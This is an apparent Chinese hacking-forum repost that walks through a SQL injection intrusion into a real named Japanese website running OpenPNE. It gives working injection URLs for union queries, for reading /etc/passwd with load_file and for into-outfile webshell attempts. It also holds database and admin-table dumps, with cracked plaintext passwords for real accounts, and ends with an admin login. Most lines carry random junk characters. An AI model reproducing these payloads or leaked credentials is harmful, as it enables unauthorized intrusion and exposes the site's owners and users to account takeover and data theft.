|
|
/ R1 G, O! t; z( [
3 ?: `# y6 w$ C+ v! c, B0x01. 检测 www.zuaa.jp 收集数据
* n! C% J7 |6 c3 S+ R) h# P$ \" c0 c
0 J( I9 ^! i' E* [
whatweb
+ B9 y2 T- i5 t! h F I& w5 S* h- ?. D; k9 i. ~0 R/ r+ {4 k
; Q+ Z$ x9 P" M D% F5 w8 ^- K5 v利用NMAP扫描
7 N5 [* H) d: p, C; I' W8 }
; n% v3 _* @3 \8 S* I中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
4 h O! C/ E& `* i l7 @( y) G0x02.找注入点
- f' }% L- C/ R找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390% F! `4 I) ^1 S# W; b8 x
' K; q1 a8 Q9 W5 x9 y" z
: \9 R6 o1 o$ C# a7 C' M0x03.order by
+ i3 J6 ^) d, e2 b http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1% w8 F1 X9 p2 |7 k
/ |$ I" ~0 H6 x1 F' C3 Y. k3 g
order by 28报错,order by 27正常+ E+ R! l. `, B
; S/ X5 A0 j5 a: u9 m3 b# l4 [
0x04. union手动查询
) c1 N' B5 ^6 Ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
0 }# T4 L. h* B- s @添加到 27 时正常显示
6 U% Q( Q1 u; w" V
; T7 K% s( T4 N( A9 K( l中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持+ T, Y$ ?9 o5 G$ Q
1 ^$ s5 u, ~& p( t+ M: w% b6 q
0x05. info:. I* z! [& s2 R- Z4 [- g6 F ^0 m
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( J7 l2 [* Q8 g2 ], n/ N
& V7 n: f! W; z' t4 S8 b2 Ruser: root@localhost
+ D5 Y! j0 ~' E* ~3 ndatabase: openpne
/ u2 i; l- q1 o4 g, T" Oversion: 4.1.22
% Y6 |% n# Q' c8 U0 u$ p& aos: portbld-freebsd5.4+ z4 C4 k, M9 u- U2 ]4 |
+ R; U! b- z$ ^0x06. root用户
. V: @/ \4 Q& h$ K0 T) Y利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)6 N! X. O0 j9 \2 u: |
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
8 e6 F% ?' B* h1 ]. y: Y0 p$ _1 a6 Z. ?# J/ x, @
通过工具转换9 S9 F# Y' i6 `: P9 }8 Q' H& e e: X4 J
1 O) G& g9 w& O% w j8 E0 v
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持3 p' n b: [! K$ O. l# ^
+ S2 Z! {* C- ^# c \
0x07. 利用 into outfile
9 L0 a+ Z& I: {全部都失败5 o" I. Z( F$ i2 Y
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php& q, ?( O0 b! I* e
+ j# Y% x, o/ P9 L
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php , n. \& t) o' z" Q
2 D7 B: g+ ?4 ^- C* ?& ]
页面显示“MDB2 Error:syntax error”
) i" ?4 @. D% T6 X) u- r/ j
0 `2 d# M p6 r0 E' x0 _0 F. P7 B2 g0x08. 利用 mysql 4.1
1 _; U& P/ d1 Z2 A: o# K猜常规表名,字段未果 工具 sqlmap
0 ^+ N t9 d$ k- Q% t/ p" D2 B, z中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持- ^9 K3 x. K( m4 t u
6 g( ?. Q, i% u6 ]1 H$ W
+ ~9 d9 p7 {) f+ K
2 y e2 x2 }+ h+ f6 T0x09. 查找后台
9 X# ?$ M! t3 E9 Y! [0 f利用 现有的各种 后台工具尝试都不行
( E: n! l: a2 X P* e$ d0 g3 L8 r8 |* l% m* d3 e+ a
0x10. MySL外联方法
6 J+ o5 A3 W2 v' b3 W从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行8 F6 B: A* `% ^/ j p# X8 _* V
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
+ n, `5 m7 T" K Thttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user. W2 C4 g) ?# y6 `1 s7 T
$ f" x3 I9 f0 v6 \3 I7 Z6 `
这个可以在 www.cmd5.com 解密- M) V) t' K) A; p
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
; a& X9 W' l; k! |chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97! ^* E0 \0 Y$ h4 j! y$ ^
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
) S- H) C4 U N) q# L3 d& F' Ozuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
2 ^ M+ D2 l2 a# i+ V4 F, G( A工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
1 L2 _; G0 @5 n: L* k# z: t1 ~
/ }9 z _. w( ~. Q' b z1 a" j0 J8 |# R
0x11. 网站突破: l' L# ~ [5 Z& U8 {) P
发现网站的源程序 openpne, google 下载 openpne 源码' G, ^ o0 e# U
! e* L8 d6 T4 t
5 m9 U2 V0 e. T
0x12. 默认信息利用# @9 M& P2 z2 Q q# P
http://sns.zuaa.jp/?m=admin&a=page_login4 ?$ t1 Y, H4 \$ G, j6 |
. [' u- |) W$ y5 q/ C( V
表名 (c_admin_user) ,字段名(username,password), B% j! W9 ^4 p; `9 j
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user5 g6 `: Y: n! S+ H
3 t5 ~: g, A' p0 [; C3 A+ `- I解密
+ ]$ P+ z! V: j- Bzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
) k" X- F2 R! w) B0 ]zuaajp:c0923ec5857796a393da99905008c176, zju1897
; |1 n) [$ u4 c+ ^ f; @, v( Y
+ B% ^+ J# o0 h* q- f8 d' G中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持9 Q$ ~+ v7 E2 `1 f; ?
7 L3 R1 y0 ^/ J1 Z/ ?
0x13. 登录后台
0 K% m0 u2 a& ]) p3 }3 {2 C8 ?/ y- _% v0 C
9 \% l5 \. T( {" g* T
* n1 B+ y& |+ Z8 a$ e( M$ m5 w- ^0x14. 小结" x, p% L1 o/ C% G! G+ A# h
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
- h7 Q* Y$ k* k6 r0 o/ D感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点9 `) a6 V q+ _8 A8 j0 h0 f, c# @1 M* @
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
7 T& P' U1 Z. o v G4 B5 \中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持$ V3 a! `% i( H4 i
) e! k8 G; v3 A- s$ F
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!0 H1 p) G' s) M& Y6 Z6 `
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|